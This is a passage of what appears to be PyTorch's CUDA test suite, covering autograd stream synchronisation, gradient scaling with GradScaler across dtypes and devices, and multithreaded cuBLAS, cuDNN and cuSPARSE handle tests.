size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# The assertEqual calls below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t(), which is not contiguous but still non-overlapping and dense
# - variants of g.clone()[:, :5], which are not non-overlapping and dense
# Non-overlapping and dense grads route into a multi-tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
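# In user code the bookkeeping exercised above is normally driven through
# GradScaler rather than torch._amp_update_scale_ directly, roughly:
#     scaler.scale(loss).backward()
#     scaler.step(optimizer)
#     scaler.update()   # grows or backs off the scale as tested here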
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s / 4).to_dense()))
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s.half() / 4).to_dense()))
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.cuda.amp.autocast(enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned very carefully.
# Too small a number makes it hard for the race condition to happen,
# while too large a number sometimes causes a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
self.assertFalse(torch.is_autocast_enabled())
with torch.cuda.amp.autocast():
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
